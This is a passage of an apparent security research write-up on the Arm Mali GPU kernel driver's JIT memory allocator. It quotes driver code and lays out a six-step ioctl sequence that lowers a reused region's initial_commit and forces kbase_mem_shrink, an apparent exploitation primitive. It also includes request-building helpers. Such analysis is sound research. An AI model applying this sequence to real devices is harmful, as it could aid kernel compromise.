<p>To change the value of <code class="language-plaintext highlighter-rouge">reg-&gt;initial_commit</code>, we can use the kcpu
<code class="language-plaintext highlighter-rouge">BASE_KCPU_COMMAND_TYPE_JIT_ALLOC</code> command. This command is handled by
<code class="language-plaintext highlighter-rouge">kbase_kcpu_jit_allocate_process</code>, which calls <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> to perform the actual
allocation or retrieval of a JIT memory region.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">kbase_kcpu_jit_allocate_process</span><span class="p">(</span>
		<span class="k">struct</span> <span class="n">kbase_kcpu_command_queue</span> <span class="o">*</span><span class="n">queue</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_kcpu_command</span> <span class="o">*</span><span class="n">cmd</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="cm">/* Now start the allocation loop */</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">info</span> <span class="o">=</span> <span class="n">alloc_info</span><span class="o">-&gt;</span><span class="n">info</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">,</span> <span class="n">info</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="cm">/* Create a JIT allocation */</span>
		<span class="n">reg</span> <span class="o">=</span> <span class="n">kbase_jit_allocate</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="nb">true</span><span class="p">);</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>When requesting the allocation, <code class="language-plaintext highlighter-rouge">commit_pages</code> [1] and <code class="language-plaintext highlighter-rouge">usage_id</code> [2] can be specified. They indicate, respectively, the minimum number of
backing physical pages the allocation should have and the previous JIT allocation that the user wants to reuse. Both are members of <code class="language-plaintext highlighter-rouge">struct base_jit_alloc_info</code>, which we can fill in freely and pass in the ioctl call to perform a JIT allocation.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">base_jit_alloc_info</span> <span class="p">{</span>
	<span class="n">__u64</span> <span class="n">gpu_alloc_addr</span><span class="p">;</span>
	<span class="n">__u64</span> <span class="n">va_pages</span><span class="p">;</span>
	<span class="n">__u64</span> <span class="n">commit_pages</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="n">__u64</span> <span class="n">extension</span><span class="p">;</span>
	<span class="n">__u8</span> <span class="n">id</span><span class="p">;</span>
	<span class="n">__u8</span> <span class="n">bin_id</span><span class="p">;</span>
	<span class="n">__u8</span> <span class="n">max_allocations</span><span class="p">;</span>
	<span class="n">__u8</span> <span class="n">flags</span><span class="p">;</span>
	<span class="n">__u8</span> <span class="n">padding</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
	<span class="n">__u16</span> <span class="n">usage_id</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
	<span class="n">__u64</span> <span class="n">heap_info_gpu_addr</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
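
<p>As a rough illustration of how such a request could be populated from user space, the sketch below mirrors the struct with fixed-width types so that it compiles outside the kernel tree. The helper <code class="language-plaintext highlighter-rouge">make_jit_request</code> and the example values are hypothetical and only serve to show that <code class="language-plaintext highlighter-rouge">commit_pages</code> and <code class="language-plaintext highlighter-rouge">usage_id</code> are fully caller-controlled.</p>

```c
#include <stdint.h>
#include <string.h>

/* Local mirror of the struct shown above, using <stdint.h> types so the
 * sketch builds without the driver's UAPI headers. */
struct base_jit_alloc_info {
	uint64_t gpu_alloc_addr;
	uint64_t va_pages;
	uint64_t commit_pages;       /* [1] minimum number of backing pages */
	uint64_t extension;
	uint8_t id;
	uint8_t bin_id;
	uint8_t max_allocations;
	uint8_t flags;
	uint8_t padding[2];
	uint16_t usage_id;           /* [2] selects a pooled region to reuse */
	uint64_t heap_info_gpu_addr;
};

/* Hypothetical helper (not part of the driver): build a zeroed request and
 * fill in only the fields discussed in the text. */
static struct base_jit_alloc_info
make_jit_request(uint64_t gpu_alloc_addr, uint64_t va_pages,
		 uint64_t commit_pages, uint8_t id, uint16_t usage_id)
{
	struct base_jit_alloc_info info;

	memset(&info, 0, sizeof(info)); /* padding and unused fields stay zero */
	info.gpu_alloc_addr = gpu_alloc_addr;
	info.va_pages = va_pages;
	info.commit_pages = commit_pages;
	info.id = id;
	info.usage_id = usage_id;
	return info;
}
```

<p>Calling <code class="language-plaintext highlighter-rouge">make_jit_request(addr, 64, 16, 1, 1)</code> and later <code class="language-plaintext highlighter-rouge">make_jit_request(addr, 64, 1, 1, 1)</code> would describe two requests that differ only in <code class="language-plaintext highlighter-rouge">commit_pages</code>, which is the pattern the rest of this section relies on.</p>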

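<p>When actually performing the allocation, <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> first scans the list of
inactive JIT allocations in <code class="language-plaintext highlighter-rouge">kctx-&gt;jit_pool_head</code> for a suitable region that has the same
<code class="language-plaintext highlighter-rouge">usage_id</code> as the one specified in the request (this pass is skipped when <code class="language-plaintext highlighter-rouge">usage_id</code> is 0). If there is no such region, it
searches the same list again, this time ignoring <code class="language-plaintext highlighter-rouge">usage_id</code>. In both passes, the candidate whose number of backing physical pages is closest to <code class="language-plaintext highlighter-rouge">commit_pages</code> is chosen.</p>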

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="nf">kbase_jit_allocate</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		<span class="k">const</span> <span class="k">struct</span> <span class="n">base_jit_alloc_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
		<span class="n">bool</span> <span class="n">ignore_pressure_limit</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="cm">/*
	 * Scan the pool for an existing allocation which meets our
	 * requirements and remove it.
	 */</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">info</span><span class="o">-&gt;</span><span class="n">usage_id</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
		<span class="cm">/* First scan for an allocation with the same usage ID */</span>
		<span class="n">reg</span> <span class="o">=</span> <span class="n">find_reasonable_region</span><span class="p">(</span><span class="n">info</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_pool_head</span><span class="p">,</span> <span class="nb">false</span><span class="p">);</span>

	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">reg</span><span class="p">)</span>
		<span class="cm">/* No allocation with the same usage ID, or usage IDs not in
		 * use. Search for an allocation we can reuse.
		 */</span>
		<span class="n">reg</span> <span class="o">=</span> <span class="n">find_reasonable_region</span><span class="p">(</span><span class="n">info</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_pool_head</span><span class="p">,</span> <span class="nb">true</span><span class="p">);</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="c1">// region found, move to active list</span>
		<span class="n">list_move</span><span class="p">(</span><span class="o">&amp;</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">jit_node</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_active_head</span><span class="p">);</span>
		<span class="p">...</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="n">kbase_jit_grow</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">reg</span><span class="p">,</span> <span class="n">prealloc_sas</span><span class="p">,</span>
				     <span class="n">mmu_sync_info</span><span class="p">);</span>
		<span class="p">...</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span>
<span class="nf">find_reasonable_region</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">base_jit_alloc_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
		       <span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">pool_head</span><span class="p">,</span> <span class="n">bool</span> <span class="n">ignore_usage_id</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">list_for_each_entry</span><span class="p">(</span><span class="n">walker</span><span class="p">,</span> <span class="n">pool_head</span><span class="p">,</span> <span class="n">jit_node</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">((</span><span class="n">ignore_usage_id</span> <span class="o">||</span>
		     <span class="n">walker</span><span class="o">-&gt;</span><span class="n">jit_usage_id</span> <span class="o">==</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">usage_id</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
		    <span class="n">walker</span><span class="o">-&gt;</span><span class="n">jit_bin_id</span> <span class="o">==</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">bin_id</span> <span class="o">&amp;&amp;</span>
		    <span class="n">meet_size_and_tiler_align_top_requirements</span><span class="p">(</span><span class="n">walker</span><span class="p">,</span> <span class="n">info</span><span class="p">))</span> <span class="p">{</span>
			<span class="kt">size_t</span> <span class="n">min_size</span><span class="p">,</span> <span class="n">max_size</span><span class="p">,</span> <span class="n">diff</span><span class="p">;</span>

			<span class="n">min_size</span> <span class="o">=</span> <span class="n">min_t</span><span class="p">(</span><span class="kt">size_t</span><span class="p">,</span> <span class="n">walker</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">nents</span><span class="p">,</span>
					 <span class="n">info</span><span class="o">-&gt;</span><span class="n">commit_pages</span><span class="p">);</span>
			<span class="n">max_size</span> <span class="o">=</span> <span class="n">max_t</span><span class="p">(</span><span class="kt">size_t</span><span class="p">,</span> <span class="n">walker</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">nents</span><span class="p">,</span>
					 <span class="n">info</span><span class="o">-&gt;</span><span class="n">commit_pages</span><span class="p">);</span>
			<span class="n">diff</span> <span class="o">=</span> <span class="n">max_size</span> <span class="o">-</span> <span class="n">min_size</span><span class="p">;</span>

			<span class="k">if</span> <span class="p">(</span><span class="n">current_diff</span> <span class="o">&gt;</span> <span class="n">diff</span><span class="p">)</span> <span class="p">{</span>
				<span class="n">current_diff</span> <span class="o">=</span> <span class="n">diff</span><span class="p">;</span>
				<span class="n">closest_reg</span> <span class="o">=</span> <span class="n">walker</span><span class="p">;</span>
			<span class="p">}</span>

			<span class="cm">/* The allocation is an exact match */</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">current_diff</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
				<span class="k">break</span><span class="p">;</span>
		<span class="p">}</span>
	<span class="p">}</span>

	<span class="k">return</span> <span class="n">closest_reg</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
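
<p>The two-pass lookup can be modelled in a few lines of standalone C. This is only a sketch under simplifying assumptions: <code class="language-plaintext highlighter-rouge">model_region</code>, <code class="language-plaintext highlighter-rouge">model_find_region</code> and <code class="language-plaintext highlighter-rouge">model_pick_region</code> are hypothetical names, the pool is a plain array instead of a <code class="language-plaintext highlighter-rouge">list_head</code>, and the <code class="language-plaintext highlighter-rouge">meet_size_and_tiler_align_top_requirements</code> check is left out.</p>

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-in for a pooled kbase_va_region (hypothetical type). */
struct model_region {
	uint16_t usage_id;
	uint8_t bin_id;
	size_t nents; /* pages currently backing the region */
};

/* One pass over the pool: return the index of the candidate whose backing
 * size is closest to commit_pages, or -1 if nothing matches. */
static int model_find_region(const struct model_region *pool, size_t n,
			     uint16_t usage_id, uint8_t bin_id,
			     size_t commit_pages, bool ignore_usage_id)
{
	size_t current_diff = SIZE_MAX;
	int closest = -1;

	for (size_t i = 0; i < n; i++) {
		if (!ignore_usage_id && pool[i].usage_id != usage_id)
			continue;
		if (pool[i].bin_id != bin_id)
			continue;

		size_t diff = pool[i].nents > commit_pages ?
				      pool[i].nents - commit_pages :
				      commit_pages - pool[i].nents;

		if (current_diff > diff) {
			current_diff = diff;
			closest = (int)i;
		}
		if (current_diff == 0)
			break; /* exact match, stop early */
	}
	return closest;
}

/* Two passes, in the same order as kbase_jit_allocate: first restricted to
 * the requested usage_id (skipped when it is 0), then ignoring it. */
static int model_pick_region(const struct model_region *pool, size_t n,
			     uint16_t usage_id, uint8_t bin_id,
			     size_t commit_pages)
{
	int idx = -1;

	if (usage_id != 0)
		idx = model_find_region(pool, n, usage_id, bin_id,
					commit_pages, false);
	if (idx < 0)
		idx = model_find_region(pool, n, usage_id, bin_id,
					commit_pages, true);
	return idx;
}
```

<p>The point to take away is that a matching <code class="language-plaintext highlighter-rouge">usage_id</code> wins over a closer size: a pooled region is selected in the first pass even if another region with a different <code class="language-plaintext highlighter-rouge">usage_id</code> would have been a better fit.</p>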

<p>If a region is found, <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> will first move the region into an active list
(<code class="language-plaintext highlighter-rouge">kctx-&gt;jit_active_head</code>) and then call <code class="language-plaintext highlighter-rouge">kbase_jit_grow</code> which will attempt to allocate more
backing physical pages and map them if the <code class="language-plaintext highlighter-rouge">commit_pages</code> specified is more than the current
number of backing physical pages for the region.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">kbase_jit_grow</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		  <span class="k">const</span> <span class="k">struct</span> <span class="n">base_jit_alloc_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
		  <span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span><span class="p">,</span>
		  <span class="k">struct</span> <span class="n">kbase_sub_alloc</span> <span class="o">**</span><span class="n">prealloc_sas</span><span class="p">,</span>
		  <span class="k">enum</span> <span class="n">kbase_caller_mmu_sync_info</span> <span class="n">mmu_sync_info</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">nents</span> <span class="o">&gt;=</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">commit_pages</span><span class="p">)</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="cm">/* Grow the backing */</span>
	<span class="n">old_size</span> <span class="o">=</span> <span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">nents</span><span class="p">;</span>

	<span class="cm">/* Allocate some more pages */</span>
	<span class="n">delta</span> <span class="o">=</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">commit_pages</span> <span class="o">-</span> <span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">nents</span><span class="p">;</span>
	<span class="n">pages_required</span> <span class="o">=</span> <span class="n">delta</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">gpu_pages</span> <span class="o">=</span> <span class="n">kbase_alloc_phy_pages_helper_locked</span><span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="p">,</span> <span class="n">pool</span><span class="p">,</span>
			<span class="n">delta</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">prealloc_sas</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
	<span class="p">...</span>
<span class="nl">done:</span>
	<span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

	<span class="cm">/* Update attributes of JIT allocation taken from the pool */</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">initial_commit</span> <span class="o">=</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">commit_pages</span><span class="p">;</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">extension</span> <span class="o">=</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">extension</span><span class="p">;</span>

<span class="nl">update_failed:</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If the region already has at least as many backing physical pages as the <code class="language-plaintext highlighter-rouge">info-&gt;commit_pages</code> specified, the fast path is taken and
<code class="language-plaintext highlighter-rouge">reg-&gt;initial_commit</code> is set to the requested value without performing any actual allocation or mapping. This
makes it possible to lower the <code class="language-plaintext highlighter-rouge">reg-&gt;initial_commit</code> of a previously allocated region below its original value simply by making another JIT allocation request.</p>

<p>On the other hand, when there are no inactive JIT allocations to reuse, <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code>
will allocate a new memory region using <code class="language-plaintext highlighter-rouge">kbase_mem_alloc</code>. A newly initialized <code class="language-plaintext highlighter-rouge">kbase_context</code>
has no active or inactive JIT allocations, as each <code class="language-plaintext highlighter-rouge">kbase_context</code> maintains its own
<code class="language-plaintext highlighter-rouge">kctx-&gt;jit_active_head</code> and <code class="language-plaintext highlighter-rouge">kctx-&gt;jit_pool_head</code> lists. Thus, a new <code class="language-plaintext highlighter-rouge">kbase_context</code> will always take the allocation path when attempting to allocate a JIT region for the first time.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="nf">kbase_jit_allocate</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		<span class="k">const</span> <span class="k">struct</span> <span class="n">base_jit_alloc_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
		<span class="n">bool</span> <span class="n">ignore_pressure_limit</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="cm">/* No suitable JIT allocation was found so create a new one */</span>
		<span class="n">u64</span> <span class="n">flags</span> <span class="o">=</span> <span class="n">BASE_MEM_PROT_CPU_RD</span> <span class="o">|</span> <span class="n">BASE_MEM_PROT_GPU_RD</span> <span class="o">|</span>
			<span class="n">BASE_MEM_PROT_GPU_WR</span> <span class="o">|</span> <span class="n">BASE_MEM_GROW_ON_GPF</span> <span class="o">|</span>
			<span class="n">BASE_MEM_COHERENT_LOCAL</span> <span class="o">|</span>
			<span class="n">BASEP_MEM_NO_USER_FREE</span><span class="p">;</span>
		<span class="p">...</span>
		<span class="n">reg</span> <span class="o">=</span> <span class="n">kbase_mem_alloc</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">va_pages</span><span class="p">,</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">commit_pages</span><span class="p">,</span>
							<span class="n">info</span><span class="o">-&gt;</span><span class="n">extension</span><span class="p">,</span>
			<span class="o">&amp;</span><span class="n">flags</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">gpu_addr</span><span class="p">,</span> <span class="n">mmu_sync_info</span><span class="p">);</span>
		<span class="p">...</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">ignore_pressure_limit</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">WARN_ON</span><span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">jit_node</span><span class="p">));</span>
		<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
			<span class="n">mutex_lock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_evict_lock</span><span class="p">);</span>
			<span class="n">list_add</span><span class="p">(</span><span class="o">&amp;</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">jit_node</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_active_head</span><span class="p">);</span>
			<span class="n">mutex_unlock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_evict_lock</span><span class="p">);</span>
		<span class="p">}</span>
	<span class="p">}</span>
	<span class="p">...</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">jit_usage_id</span> <span class="o">=</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">usage_id</span><span class="p">;</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">jit_bin_id</span> <span class="o">=</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">bin_id</span><span class="p">;</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">|=</span> <span class="n">KBASE_REG_ACTIVE_JIT_ALLOC</span><span class="p">;</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The new JIT region takes on the specified <code class="language-plaintext highlighter-rouge">usage_id</code>, which is what <code class="language-plaintext highlighter-rouge">find_reasonable_region</code> matches against on reuse, and it is
created with the <code class="language-plaintext highlighter-rouge">BASEP_MEM_NO_USER_FREE</code> flag, which sets the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag on the region [1]. This prevents the region from being freed from user space and prevents alias regions that point to it from being created [2].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_update_region_flags</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">)</span> 
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">BASEP_MEM_NO_USER_FREE</span><span class="p">)</span>
		<span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">|=</span> <span class="n">KBASE_REG_NO_USER_FREE</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="p">...</span>
<span class="p">}</span>

<span class="n">u64</span> <span class="nf">kbase_mem_alias</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="n">u64</span> <span class="o">*</span><span class="n">flags</span><span class="p">,</span> <span class="n">u64</span> <span class="n">stride</span><span class="p">,</span>
	    <span class="n">u64</span> <span class="n">nents</span><span class="p">,</span> <span class="k">struct</span> <span class="n">base_mem_aliasing_info</span> <span class="o">*</span><span class="n">ai</span><span class="p">,</span>
	    <span class="n">u64</span> <span class="o">*</span><span class="n">num_pages</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">aliasing_reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">KBASE_REG_NO_USER_FREE</span><span class="p">)</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
			<span class="k">goto</span> <span class="n">bad_handle</span><span class="p">;</span> <span class="cm">/* JIT regions can't be
					  * aliased. NO_USER_FREE flag
					  * covers the entire lifetime
					  * of JIT regions. The other
					  * types of regions covered
					  * by this flag also shall
					  * not be aliased.
					  */</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Conversely, <code class="language-plaintext highlighter-rouge">kbase_jit_free</code> undoes <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code>, but it does not
actually free the JIT allocation. Instead, it marks the region as inactive and moves it to <code class="language-plaintext highlighter-rouge">kctx-&gt;jit_pool_head</code> for potential reuse in the
future [1].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">kbase_jit_free</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_current_allocations</span><span class="o">--</span><span class="p">;</span>
	<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_current_allocations_per_bin</span><span class="p">[</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">jit_bin_id</span><span class="p">]</span><span class="o">--</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">|=</span> <span class="n">KBASE_REG_DONT_NEED</span><span class="p">;</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;=</span> <span class="o">~</span><span class="n">KBASE_REG_ACTIVE_JIT_ALLOC</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">list_move</span><span class="p">(</span><span class="o">&amp;</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">jit_node</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_pool_head</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We can specify by id which JIT allocations we want to free when using the relevant ioctl.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">base_kcpu_command_jit_free_info</span> <span class="p">{</span>
	<span class="n">__u64</span> <span class="n">ids</span><span class="p">;</span> <span class="c1">// An array containing the JIT IDs to free</span>
	<span class="n">__u8</span> <span class="n">count</span><span class="p">;</span> <span class="c1">// Number of elements in the ids array</span>
	<span class="n">__u8</span> <span class="n">padding</span><span class="p">[</span><span class="mi">7</span><span class="p">];</span>
<span class="p">};</span>
</code></pre></div></div>
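
<p>A free request could be assembled along the following lines. This is a sketch rather than the driver's own code: the struct is mirrored locally with fixed-width types, <code class="language-plaintext highlighter-rouge">make_jit_free_request</code> is a hypothetical helper, and it assumes that each JIT ID is one byte wide (matching the <code class="language-plaintext highlighter-rouge">__u8 id</code> field of <code class="language-plaintext highlighter-rouge">struct base_jit_alloc_info</code>) and that <code class="language-plaintext highlighter-rouge">ids</code> carries a user-space pointer to the array.</p>

```c
#include <stdint.h>
#include <string.h>

/* Local mirror of the struct shown above. */
struct base_kcpu_command_jit_free_info {
	uint64_t ids;       /* user pointer to the array of JIT IDs */
	uint8_t count;      /* number of elements in that array */
	uint8_t padding[7];
};

/* Hypothetical helper: describe a caller-owned array of one-byte JIT IDs.
 * The array must stay alive until the command has been submitted. */
static struct base_kcpu_command_jit_free_info
make_jit_free_request(const uint8_t *ids, uint8_t count)
{
	struct base_kcpu_command_jit_free_info info;

	memset(&info, 0, sizeof(info)); /* keep the padding zeroed */
	info.ids = (uint64_t)(uintptr_t)ids;
	info.count = count;
	return info;
}
```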

<p>Thus, if we want to invoke <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code> in <code class="language-plaintext highlighter-rouge">kbase_jit_free</code>, we can do the
following:</p>

<ol>
  <li>Perform the other routine setup steps for a new <code class="language-plaintext highlighter-rouge">kbase_context</code></li>
  <li>Initialize the JIT configurations for the <code class="language-plaintext highlighter-rouge">kbase_context</code> using the
<code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_JIT_INIT</code> ioctl</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> to allocate a new region</li>
  <li>Make the region inactive using <code class="language-plaintext highlighter-rouge">kbase_jit_free</code></li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> to reuse the same region by specifying the same <code class="language-plaintext highlighter-rouge">usage_id</code>,
and request a lower <code class="language-plaintext highlighter-rouge">commit_pages</code> so that the region’s <code class="language-plaintext highlighter-rouge">initial_commit</code> is lowered</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_free</code> to shrink the region’s backing pages through <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code></li>
</ol>
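
<p>The effect of steps 3 to 6 on a single region can be traced with a small user-space model. It is only a sketch: <code class="language-plaintext highlighter-rouge">model_jit_region</code> and the <code class="language-plaintext highlighter-rouge">model_*</code> helpers are hypothetical, no real ioctl is issued, and the <code class="language-plaintext highlighter-rouge">trim_level</code> percentage used in <code class="language-plaintext highlighter-rouge">model_free</code> is an assumption about how the free path decides how far to shrink towards <code class="language-plaintext highlighter-rouge">initial_commit</code>.</p>

```c
#include <stddef.h>

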